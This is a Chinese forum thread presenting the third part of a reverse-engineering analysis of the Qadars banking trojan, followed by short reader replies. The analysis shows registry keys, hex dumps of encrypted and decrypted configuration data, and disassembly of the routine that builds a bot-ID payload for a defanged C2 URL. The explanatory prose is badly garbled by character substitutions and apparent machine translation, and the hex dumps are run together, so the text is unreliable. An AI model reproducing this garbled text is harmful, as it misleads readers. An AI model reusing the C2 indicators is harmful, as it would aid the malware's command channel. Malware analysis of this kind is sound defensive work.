解密”Qadars”银行木马(下)
本帖最后由 楚轩 于 2015-9-12 15:30 编辑呵呵{:301_998:}{:1_932:}{:1_930:}
第三阶段
那个阶段歹意硬件将创立一个初初化C&C恳求的PAYLOAD,并将PAYLOAD发送。第三阶段中PAYLOAD的创立战歹意硬件的逻辑的具体信息以下所述。
歹意硬件管帐算一些有闭计算机的特定命据(如在第两阶段所述的),并将后果与保管在:
“KEY_CURRENT_USER\Software\Classes\CLSID\{}”
中的数据停止比拟。假如相等,则歹意硬件履行到下一个阶段。
存储在注册表中的数据“HKEY_CURRENT_USER\ Software\Classes\CLSID\{}”罗列以下。
例如,在测试机上,数据的大小是0×170,存储在注册表中的减稀数据为:
00854B785F 1D B6 44 5B 87 A7 2E74 81 51 7F 34 CA CC 9D_.|D[ço.t.Q.4-|.00854B88FC 74 61 04 C2 61 9E 99E5 A7 64 02 8E D2 79 05nta.-aPÖsod.Ä-y.00854B9868 41 E1 33 96 C7 B7 EB83 35 07 43 47 1A A8 74hAß3û|+da5.CG.¿t00854BA8F7 CC B0 27 73 7A 7E 6360 D7 5B AB 43 1B 41 65˜||'sz~c`+[½C.Ae00854BB87F D1 A6 8B 85 B1 DE E4B2 B5 A7 7E 74 B6 44 14.-aïà||S||o~t|D.00854BC8B5 B8 D3 56 D3 0A 72 CC62 BF 64 F4 3F 4D F1 D8|++V+.r|b+d(?M±+00854BD884 2B 45 B8 DB BA 22 C2B5 95 34 FA 69 85 A6 01ä+E+||"-|ò4·iàa.00854BE802 80 29 90 60 A9 11 13C3 77 31 6E 06 23 BA 3A.Ç).`¬..+w1n.#|:00854BF864 D5 78 FA 2C E3 E5 3A2B 18 4C 1F 74 31 B3 25d+x·,ps:+.L.t1|%00854C08BF 78 2C 45 4F 71 F6 F1B4 5D 16 E3 CD 40 60 B8+x,EOq÷±|].p-@`+00854C18D9 7B CE AF 87 4F 88 75FB CC DB 8F AA 33 CF 46+{+»çOêuv||.¬3-F00854C283D 5D 7C 46 85 B5 92 33B7 B8 E8 E9 5D 88 17 31=]|Fà|Æ3++FT]ê.100854C3846 76 F4 EA 05 D2 71 0455 B0 BF B3 A1 E9 9C BFFv(O.-q.U|+|íT£+00854C48E7 E6 5A 51 C5 F1 4A DFCF 46 8B 4F 54 57 57 4FtμZQ+±Jˉ-FïOTWWO00854C586E EF 29 C1 BC C0 32 14B5 3D 84 4C 87 7A 73 BAnn)-++2.|=äLçzs|00854C6840 B2 06 B7 42 85 7C 4465 1E EE 69 2F 7E 37 B8@|.+Bà|De.ei/~7+00854C78E5 A6 CC 26 06 9D 32 B371 7E D0 13 45 CF 01 D9sa|&..2|q~-.E-.+00854C8877 DA 8C 8E 90 3D 0E D1F7 FE B1 24 99 20 89 C7w+îÄ.=.-˜||$Ö ë|00854C9841 1D DA 62 66 08 AF 48C9 F8 5C F8 3D 83 7E 92A.+bf.»H+°\°=a~Æ00854CA8BF 8C 18 49 CA 81 CE 7748 93 04 A3 B1 9D 07 60+î.I-.+wHô.ú|..`00854CB85B CE A7 0D 23 09 B6 8D7E 2E B9 B9 1A 73 3E 84[+o.#.|.~.||.s>ä00854CC821 9C EF 83 41 66 72 E161 4A 4D 62 4E 0E FF FE!£naAfrßaJMbN. |00854CD8C9 F2 15 3B BC 38 11 A22B 0C 35 CF F4 EB 35 E5+=.;+8.ó+.5-(d5s
解稀后的数据为:
00854E9000 00 00 00 67 01 00 00A6 69 46 69 72 73 74 54....g...aiFirstT00854EA069 6D 65 01 6E 6D 6F 6475 6C 65 73 46 65 74 63ime.nmodulesFetc00854EB068 65 64 00 66 48 61 7368 50 45 50 8A 15 4F AEhed.fHashPEPè.O«00854EC03B 78 B4 8D B1 71 C4 C949 99 E0 C0 6C 73 7A 42;x|.|q-+IÖa+lszB00854ED06F 74 6E 65 74 4E 61 6D65 67 42 4F 54 4E 45 54otnetNamegBOTNET00854EE032 6D 73 7A 49 6E 73 7461 6C 6C 50 61 74 68 782mszInstallPathx00854EF055 43 3A 5C 44 6F 63 756D 65 6E 74 73 20 61 6EUC:\Documents an00854F0064 20 53 65 74 74 69 6E67 73 5C 69 5C 41 70 70d Settings\i\App00854F106C 69 63 61 74 69 6F 6E20 44 61 74 61 5C 4D 66lication Data\Mf00854F207A 78 41 48 43 62 5C 4851 48 4B 57 62 73 76 5CzxAHCb\HQHKWbsv\00854F3050 4D 71 4C 4D 4B 74 6A5C 6F 50 51 56 4E 69 52PMqLMKtj\oPQVNiR00854F4067 73 2E 65 78 65 6C 7749 6E 73 74 61 6C 6C 50gs.exelwInstallP00854F5061 74 68 58 AA 43 00 3A00 5C 00 44 00 6F 00 63athX¬C.:.\.D.o.c00854F6000 75 00 6D 00 65 00 6E00 74 00 73 00 20 00 61.u.m.e.n.t.s. .a00854F7000 6E 00 64 00 20 00 5300 65 00 74 00 74 00 69.n.d. .S.e.t.t.i00854F8000 6E 00 67 00 73 00 5C00 69 00 5C 00 41 00 70.n.g.s.\.i.\.A.p00854F9000 70 00 6C 00 69 00 6300 61 00 74 00 69 00 6F.p.l.i.c.a.t.i.o00854FA000 6E 00 20 00 44 00 6100 74 00 61 00 5C 00 4D.n. .D.a.t.a.\.M00854FB000 66 00 7A 00 78 00 4100 48 00 43 00 62 00 5C.f.z.x.A.H.C.b.\00854FC000 48 00 51 00 48 00 4B00 57 00 62 00 73 00 76.H.Q.H.K.W.b.s.v00854FD000 5C 00 50 00 4D 00 7100 4C 00 4D 00 4B 00 74.\.P.M.q.L.M.K.t00854FE000 6A 00 5C 00 6F 00 5000 51 00 56 00 4E 00 69.j.\.o.P.Q.V.N.i00854FF000 52 00 67 00 73 00 2E00 65 00 78 00 65 00 00.R.g.s...e.x.e.. bytes 0 - 3 zeroes,bytes 4 - 7 thelength of the databytes 8 - ? dataitself.
接着,数据被符号化:
00854D0801 00 00 00 00 00 00 008A 15 4F AE 3B 78 B4 8D........è.O«;x|.00854D18B1 71 C4 C9 49 99 E0 C042 4F 54 4E 45 54 32 00|q-+IÖa+BOTNET2.............................................................................00854E1800 00 00 00 00 00 00 0000 00 00 00 00 43 3A 5C.............C:\00854E2844 6F 63 75 6D 65 6E 7473 20 61 6E 64 20 53 65Documents and Se00854E3874 74 69 6E 67 73 5C 695C 41 70 70 6C 69 63 61ttings\i\Applica00854E4874 69 6F 6E 20 44 61 7461 5C 4D 66 7A 78 41 48tion Data\MfzxAH00854E5843 62 5C 48 51 48 4B 5762 73 76 5C 50 4D 71 4CCb\HQHKWbsv\PMqL00854E684D 4B 74 6A 5C 6F 50 5156 4E 69 52 67 73 2E 65MKtj\oPQVNiRgs.e00854E7878 65 00 00 00 00 00 0000 00 00 00 00 00 00 00xe..........................................................................................00854F2800 00 43 00 3A 00 5C 0044 00 6F 00 63 00 75 00..C.:.\.D.o.c.u.00854F386D 00 65 00 6E 00 74 0073 00 20 00 61 00 6E 00m.e.n.t.s. .a.n.00854F4864 00 20 00 53 00 65 0074 00 74 00 69 00 6E 00d. .S.e.t.t.i.n.00854F5867 00 73 00 5C 00 69 005C 00 41 00 70 00 70 00g.s.\.i.\.A.p.p.00854F686C 00 69 00 63 00 61 0074 00 69 00 6F 00 6E 00l.i.c.a.t.i.o.n.00854F7820 00 44 00 61 00 74 0061 00 5C 00 4D 00 66 00 .D.a.t.a.\.M.f.00854F887A 00 78 00 41 00 48 0043 00 62 00 5C 00 48 00z.x.A.H.C.b.\.H.00854F9851 00 48 00 4B 00 57 0062 00 73 00 76 00 5C 00Q.H.K.W.b.s.v.\.00854FA850 00 4D 00 71 00 4C 004D 00 4B 00 74 00 6A 00P.M.q.L.M.K.t.j.00854FB85C 00 6F 00 50 00 51 0056 00 4E 00 69 00 52 00\.o.P.Q.V.N.i.R.00854FC867 00 73 00 2E 00 65 0078 00 65 00 00 00 00 00g.s...e.x.e.....
对存储在“HKEY_CURRENT_USER\Software\Classes\CLSID\{}\1″中的数据停止相反的操纵。
域名称号战经常使用的恳求页里被包括在一个风趣的构造中并被存储在当地的一个相似于数组的构造中:
00855EF890 67 85 00 D0 67 85 0010 68 85 00 48 68 85 00.gà.-gà..hà.Hhà.00855F082F 6E 65 74 72 65 70 6F72 74 2E 70 68 70 00 00/netreport.php..
接着,将挪用上面那个风趣函数:
.text:0040FB1B 50 push eax ;void *.text:0040FB1C 51 push ecx ;int;db 'I-C957A26036A04#972958A65880B55A0EBD5559078C1735',0 ;this is computer_name#md5hash as described in the dump.txt.text:0040FB1D 57 push edi ;int;'hxxp://soft.kcssoft.biz/netreport.php',0.text:0040FB1E E8 FD FE FF FF call c2
歹意硬件在那个函数中做的第一件工作便是创立恳求C&C效劳器的PAYLOAD。
例如,在测试机上,杂文本的PAYLOAD(少度为0x123)的第一局部为:
00856A9082 A7 69 6C 70 73 7A 426F 74 49 44 78 30 49 2DéoilpszBotIDx0I-00856AA043 39 35 37 41 32 36 3033 36 41 30 34 23 39 37C957A26036A04#9700856AB032 39 35 38 41 36 35 3838 30 42 35 35 41 30 452958A65880B55A0E00856AC042 44 35 35 35 39 30 3738 43 31 37 33 35 6B 6CBD5559078C1735kl00856AD070 73 7A 56 65 72 73 696F 6E 67 32 2E 30 2E 30pszVersiong2.0.000856AE02E 30 68 6D 61 69 6E 5479 70 65 00 67 73 75 62.0hmainType.gsub00856AF054 79 70 65 00 67 42 6974 6E 65 73 73 18 20 6BType.gBitness. k00856B0064 77 54 69 6D 65 73 7461 6D 70 00 64 44 61 74dwTimestamp.dDat00856B1061 A2 66 4C 65 6E 67 7468 00 66 6C 70 44 61 74aófLength.flpDat00856B2061 40 A7 69 6C 70 73 7A42 6F 74 49 44 78 30 49a@oilpszBotIDx0I00856B302D 43 39 35 37 41 32 3630 33 36 41 30 34 23 39-C957A26036A04#900856B4037 32 39 35 38 41 36 3538 38 30 42 35 35 41 3072958A65880B55A000856B5045 42 44 35 35 35 39 3037 38 43 31 37 33 35 6BEBD5559078C1735k00856B606C 70 73 7A 56 65 72 7369 6F 6E 67 32 2E 30 2ElpszVersiong2.0.00856B7030 2E 30 68 6D 61 69 6E54 79 70 65 00 67 73 750.0hmainType.gsu00856B8062 54 79 70 65 01 67 4269 74 6E 65 73 73 18 20bType.gBitness.00856B906B 64 77 54 69 6D 65 7374 61 6D 70 00 64 44 61kdwTimestamp.d
(上):http://www.52pojie.cn/thread-411565-1-1.html
(中):http://www.52pojie.cn/thread-411578-1-1.html
排版有点乱,语言几乎是机翻。。。(如果不是机翻,难道是我的理解方式有什么问题吗..............)
.而且防转载的乱码字节都转过来了,建议楼主好好整理下帖子,这样基本上很难阅读 沙发哟,第一次哟
我就看看不说话 又来找虐了 看得头晕目眩 有几阶段啊现在是初级吗 {:301_977:}看不懂也要顶 @willJ 发错区了,帮我转到病毒分析区,谢谢 没看懂。。 这个帖子要火 啊!
页:
[1]
2